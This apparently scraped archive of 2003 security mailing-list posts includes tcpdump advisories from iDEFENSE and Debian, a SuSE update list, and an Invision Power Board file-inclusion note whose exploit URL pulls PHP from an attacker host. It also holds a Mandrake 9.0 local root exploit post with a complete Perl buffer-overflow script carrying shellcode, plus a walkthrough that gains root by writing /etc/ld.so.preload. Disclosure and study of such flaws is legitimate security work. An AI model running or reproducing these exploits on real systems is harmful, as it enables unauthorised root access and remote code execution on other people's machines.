66b65eed8f2daefde8115abf77511bba SuSE-7.1: ftp://ftp.suse.com/pub/suse/i386/update/7.1/ap2/hypermail-2.0b29-59.i386.rpm 698338c7d9b8961ec3d4f4ab99ee2436 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/hypermail-2.0b29-59.src.rpm 8db31cd4981ee84a0333ec8200443bef Sparc Platform: SuSE-7.3: ftp://ftp.suse.com/pub/suse/sparc/update/7.3/ap2/hypermail-2.1.2-40.sparc.rpm 341757885457f2e4b018dbb132f1a8f8 source rpm(s): ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/hypermail-2.1.2-40.src.rpm cdc92a18900996524768914c79bf20d9 AXP Alpha Platform: SuSE-7.1: ftp://ftp.suse.com/pub/suse/axp/update/7.1/ap2/hypermail-2.0b29-37.alpha.rpm 980f217c12affcb3c0a6d0fd916a5115 source rpm(s): ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/hypermail-2.0b29-37.src.rpm a2242ecc8ba2a13c3d18ca94e6ba23f0 PPC Power PC Platform: SuSE-7.3: ftp://ftp.suse.com/pub/suse/ppc/update/7.3/ap2/hypermail-2.1.2-98.ppc.rpm 6c7a197fe18a95b7594b2cd7b572837a source rpm(s): ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/hypermail-2.1.2-98.src.rpm e370de5432545f06731c9f841bc84054 SuSE-7.1: ftp://ftp.suse.com/pub/suse/ppc/update/7.1/ap2/hypermail-2.0b29-38.ppc.rpm 64b3be05678f4789985824e31f8335d2 source rpm(s): ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/hypermail-2.0b29-38.src.rpm 4cd2b65522738594d0b60333f807b8b2 __ 2) Pending vulnerabilities in SuSE Distributions and Workarounds: - vnc
iDEFENSE Security Advisory 02.27.03: TCPDUMP Denial of Service Vulnerability in ISAKMP Packet Parsing
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
iDEFENSE Security Advisory 02.27.03:
http://www.idefense.com/advisory/02.27.03.txt
TCPDUMP Denial of Service Vulnerability in ISAKMP Packet Parsing
February 27, 2003
I. BACKGROUND
TCPDUMP is a widely used network debugging tool that prints out the
headers of packets on a network interface that match a boolean expression.
More information about the application is available at
http://www.tcpdump.org .
II. DESCRIPTION
A vulnerability exists in the parsing of ISAKMP packets (UDP port 500)
that allows an attacker to force TCPDUMP into an infinite loop upon
receipt of a specially crafted packet.
The following output is from TCPDUMP replaying a previously captured
malformed ISAKMP packet:
# tcpdump -vvvr tcpdump_isakmp_inf_loop | head 05:14:57.954719
192.168.2.243.isakmp > 192.168.2.243.isakmp: isakmp 8.9 msgid 7d380dee
cookie 773b4e8a1618caa8->51efacc0a65e0334: phase 2/others ? #69[C]:
(#83)
(#237)
(#237)
(#237)
(#237)
(#237)
(#237)
(#237)
(#237)
...
The string "(#237)" will continue to print indefinitely; at this point
TCPDUMP is no longer processing other packets. The vulnerable segment of
code has been narrowed down to the following loop from
print_isakmp.c:isakmp_sub_print(), the while() loop is never broken as the
variable 'np' never equates to zero:
while (np) {
safememcpy(&e, ext, sizeof(e));
if (ep < (u_char *)ext + ntohs(e.len)) {
printf(" [|%s]", NPSTR(np));
cp = ep + 1;
break;
}
depth++;
printf("\n");
for (i = 0; i < depth; i++)
printf("");
printf("(");
cp = isakmp_sub0_print(np, ext, ep, phase, doi, proto);
printf(")");
depth--;
np = e.np;
ext = (struct isakmp_gen *)cp;
}
III. ANALYSIS
Any remote user can generate a specially crafted packet that will cause
TCPDUMP to enter an infinite loop thereby rendering the application
useless and preventing the administrator from viewing network traffic.
Attackers can anonymously trigger this vulnerability by spoofing the
source address of the malicious packet, this is possible because it
traverses over the User Datagram Protocol (UDP), a stateless protocol.
While the vulnerability exists specifically in the TCPDUMP code base there
are some applications that utilize code from TCPDUMP or "wrap" around
TCPDUMP, and such applications would also be affected.
IV. DETECTION
iDEFENSE has confirmed the existence of this vulnerability in TCPDUMP
versions 3.6, 3.6.3, 3.7.1 built against LIBPCAP versions .6 and .7 on
both the Linux and FreeBSD platform. Many other Linux distributions
contain vulnerable TCPDUMP versions
V. RECOVERY
An affected application is rendered useless upon entry into the infinite
loop. The application must be restarted to regain normal functionality.
VI. WORKAROUND
An ad hoc work around that can be implemented until an official vendor
patch has been made available is to simply filter out parsing of packets
destined to TCP or UDP port 500. This will prevent a malformed packet from
affected a vulnerable version of TCPDUMP. The addition of the following
boolean string can be used to accomplish this task:
[and] dst port not 500
Where the [and] is optional depending on whether or not additional boolean
expressions are provided.
VII. VENDOR FIX/RESPONSE
This vulnerability was already closed by Guy Harris during routine
development; users of the CVS version downloaded since September 6, 2002
(revision 1.34 of print-isakmp.c) are not vulerable. The new 3.7.2
tcpdump release includes this and a couple of additional security
fixes; the 0.7.2 libpcap release includes new functionality but no
security fixes.
The following packages are available:
http://www.tcpdump.org/release/tcpdump-3.7.2.tar.gz
http://www.tcpdump.org/release/libpcap-0.7.2.tar.gz
Debian 2.2 (potato) contains tcpdump 3.4a6, which does not appear to be
vulnerable (version 3.4a6 does not include an isakmp dissector). Debian
3.0 (woody) contains tcpdump 3.6.2, which is vulnerable. Updated packages
are available from http://www.debian.org/security/ .
VIII. CVE INFORMATION
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has
assigned the identification number CAN-2003-0108 to this issue.
XI. DISCLOSURE TIMELINE
12/09/2002 Issue disclosed to iDEFENSE
02/25/2003 TCPDUMP maintainers notified: [EMAIL PROTECTED],
[EMAIL PROTECTED], [EMAIL PROTECTED] and
[EMAIL PROTECTED]
02/25/2003 Responses from Guy Harris, Bill Fenner, Michael Richardson
02/25/2003 iDEFENSE clients notified
02/26/2003 OS vendors notified via [EMAIL PROTECTED]
02/27/2003 Public Disclosure
X. CREDIT
Andrew Griffiths ([EMAIL PROTECTED]) is credited with discovering this
vulnerability.
Get paid for security research
http://www.idefense.com/contributor.html
Subscribe to iDEFENSE Advisories:
send email to [EMAIL PROTECTED], subject line: "su
Invision Power Board (PHP)
Informations : °° Website : http://www.invisionboard.com -- Version : 1.0.1 Problem : phpinfo() -- Version : 1.1.1 Problem : File Including PHP Code/Location : °°° v1.0.1 : phpinfo.php : -- -- v1.1.1 : ipchat.php : - require $root_path."conf_global.php"; - (this is a hole if register_globals=ON) Exploits : °° v1.0.1 : http://[target]/phpinfo.php v1.1.1 : http://[target]/ipchat.php?root_path=http://[attacker]/ with : http://[attacker]/conf_global.php Patchs : Patchs for both versions has been published on http://www.phpsecure.org . More Details : °° In French : http://www.frog-man.org/tutos/InvisionPowerBoard.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FInvisionPowerBoard.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools [EMAIL PROTECTED] _ Recevez vos e-mails MSN Hotmail par SMS sur votre GSM ! http://www.fr.msn.be/gsm/servicesms/hotmailparsms
Re: MS-Windows ME IE/Outlook/HelpCenter critical vulnerability
Hi, My post entitled "MS-Windows ME IE/Outlook/HelpCenter critical vulnerability" was parsed incorrectly by the securityfocus mailing-list manager, giving me a From: adress "[EMAIL PROTECTED]". My contact e-mail is [EMAIL PROTECTED] I am not, in any way, a member of securityfocus.com. Thanks, Fozzy The Hackademy Audit, Journal & School - Paris http://www.thehackademy.net PS: with respect to the reported security issue, please take good note that this is a WinME issue. Windows XP is vulnerable _only_ if patch MS02-060 was not applied. So most WinXP users are safe. Moreover, a Microsoft guy told me the Help Center is not included in Windows 2000, so Win2000 should not be vulnerable.
Mandrake 9.0 local root exploit
--
Priv8 Security - www.priv8security.com
priv8mdk90.tar.gz - Mandrake 9.0 local root exploit
Based on Idefense adv.
http://www.idefense.com/advisory/01.21.03.txt
Greets to : coideloko, chroot-, xtc , M|ght, exitus,
overkill, blood_sucker, lkm, Brother
execk, printf, heap, diguin, n4rfy(nordico :ppp) and
all friends of Priv8 security.
OBS. My english sux...
--
Ok, our goal is to get root by exploiting ml85p thats
suid root by default on mdk 9.0
[EMAIL PROTECTED] priv8]$ ls -l /usr/bin/ml85p
-rwsr-x---1 root sys 12344 Set 17 16:40
/usr/bin/ml85p*
You can see that we gona need group sys to run it so
first lets get it.
[EMAIL PROTECTED] priv8]$ ls -l /usr/bin/mtink
-rwxr-sr-x1 lp sys132600 Set 17 16:40
/usr/bin/mtink*
[EMAIL PROTECTED] priv8]$ ls -l /usr/bin/escputil
-rwxr-sr-x1 lp sys 32088 Set 17 16:40
/usr/bin/escputil*
We have two here that are vuln, mtink has a stack
overflow on env HOME and escputil
has a stack over too on command line arg, for more
details read idefense adv.
So here we go
First we get gid sys by exploiting mtink or escputil, u
can choose what one u want to.
[EMAIL PROTECTED] priv8]$ id
uid=503(wsxz) gid=503(wsxz) grupos=503(wsxz)
[EMAIL PROTECTED] priv8]$ perl priv8mtink.pl
Priv8security.com Mandrake 9 mtink local sys exploit!!
usage: priv8mtink.pl offset
Using address: 0xba80
sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)
And now we can exploit ml85p
1 - Writing any file on system!!!
sh-2.05b$ perl priv8ml85p.pl /root/hi-there-Mr-root
Let write some files ok ;p
Now just press enter ;)
Wrong file format.
file position:
sh-2.05b$
Now we check if it worked
[EMAIL PROTECTED] root]# pwd
/root
[EMAIL PROTECTED] root]# ls -l hi*
-rw-rw-rw-1 root sys 0 Fev 24 03:32
hi-there-Mr-root
2 - Geting root with it ;)
I will do the same thing on idefense adv, so lets do it..
sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)
sh-2.05b$ perl priv8ml85p.pl /etc/ld.so.preload
Let write some files ok ;p
Now just press enter ;)
Wrong file format.
file position:
sh-2.05b$ ls -l /etc/ld.so.preload
-rw-rw-rw-1 root sys 0 Feb 26 00:12
/etc/ld.so.preload
sh-2.05b$ cd /tmp
sh-2.05b$ echo 'int getuid(void) { return 0; }' > lib.c
sh-2.05b$ export PATH="/usr/bin:/usr/sbin:/sbin:/bin"
sh-2.05b$ gcc -fPIC -c /tmp/lib.c
sh-2.05b$ gcc -o /tmp/lib.so -shared /tmp/lib.o
sh-2.05b$ echo "/tmp/lib.so" > /etc/ld.so.preload
sh-2.05b$ su -
[EMAIL PROTECTED] root]# id
uid=0(root) gid=0(root) grupos=0(root)
It worked, so take care what u ll write ok ;)
that's it.
--
priv8escputil.pl
--
#!/usr/bin/perl
##
#Priv8security.com escputil local sys exploit.
#
# Tested on Mandrake 9.0 only.
# Based on
http://www.idefense.com/advisory/01.21.03.txt
#
#
$shellcode =
"\x31\xc0\xb0". #setregid(x,x) - where x = x03 sys gid
"\x03".# x = x03 sys gid
"\x89\xc3\x89\xc1\xb0\x47\xcd\x80".#end setregid()
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
$size = 1050;
$retaddr = 0xb4e0;
$nop = "\x90";
$offset = 0;
if (@ARGV == 1) {
$offset = $ARGV[0];
}
print " Priv8security.com Mandrake 9 escputil local
sys exploit!!\n";
print " usage: $0 offset\n";
for ($i = 0; $i < ($size - length($shellcode) - 4);
$i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
print " Using address: 0x",
sprintf('%lx',($retaddr + $offset)), "\n";
$newret = pack('l', ($retaddr +
$offset));
for ($i += length($shellcode); $i <
$size; $i += 4) {
$buffer .= $newret;
}
exec("/usr/bin/escputil -c -P
$buffer");
--
priv8ml85p.pl
---
[SECURITY] [DSA 255-1] New tcpdump packages fix denial of service vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 255-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze February 27th, 2003 http://www.debian.org/security/faq - -- Package: tcpdump Vulnerability : infinite loop Problem-Type : remote Debian-specific: no CVE Id : CAN-2003-0108 Andrew Griffiths and iDEFENSE Labs discovered a problem in tcpdump, a powerful tool for network monitoring and data acquisition. An attacker is able to send a specially crafted network packet which causes tcpdump to enter an infinite loop. In addition to the above problem the tcpdump developers discovered a potential infinite loop when parsing malformed BGP packets. They also discovered a buffer overflow that can be exploited with certain malformed NFS packets. For the stable distribution (woody) these problems have been fixed in version 3.6.2-2.3. For the old stable distribution (potato) does not seem to be affected by this problem. For the unstable distribution (sid) these problems have been fixed in version 3.7.1-1.2. We recommend that you upgrade your tcpdump packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3.dsc Size/MD5 checksum: 587 7316fea776a03291973de9db5dda34a1 http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3.diff.gz Size/MD5 checksum:10413 467813aab9a57869160e3082c7a11679 http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2.orig.tar.gz Size/MD5 checksum: 380635 6bc8da35f9eed4e675bfdf04ce312248 Alpha architecture: http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_alpha.deb Size/MD5 checksum: 213570 17577dd6cbe33e486dd8b193a3f188b0 ARM architecture: http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_arm.deb Size/MD5 checksum: 179598 005967e88f0895d8f962f07f3db525f7 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_i386.deb Size/MD5 checksum: 169482 2e6aadf125c8e7bbde3d0dd162201480 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_ia64.deb Size/MD5 checksum: 246744 c42598c647c1380689a7e196a7f685bb HP Precision architecture: http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_hppa.deb Size/MD5 checksum: 192974 6d2133766c5e3d2dd5d8121a55d57bed Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_m68k.deb Size/MD5 checksum: 157444 b20c63dca863d7e752eac1ac8089b469 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_mips.deb Size/MD5 checksum: 188792 07f375adc0a86d704ce12e6f50036fa8 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_mipsel.deb Size/MD5 checksum: 193058 46aa1ad7a702c9214e028c7f1f7bf877 PowerPC architecture: http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_powerpc.deb Size/MD5 checksum: 176780 074f39b9dcc3d4d47f73c8e2052ff91c IBM S/390 architecture: http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_s390.deb Size/MD5 checksum: 174304 72e42bf4582d67d69b2f6bc84961f7db Sun Sparc architecture: http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_sparc.deb Size/MD5 checksum: 179182 e1ebe0dec3667c68f8213827e66826fe These files will probably be moved into the stable distribution on its next revision. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE+XnZ6W5ql+IAeqTIRAmFFAJ9/XqbMsibLWcHpzwULzXtLrrv/YACgsiZM Z8FnivzplvG1QcNhYnlljVk= =cFNB -END PGP SIGNATURE-
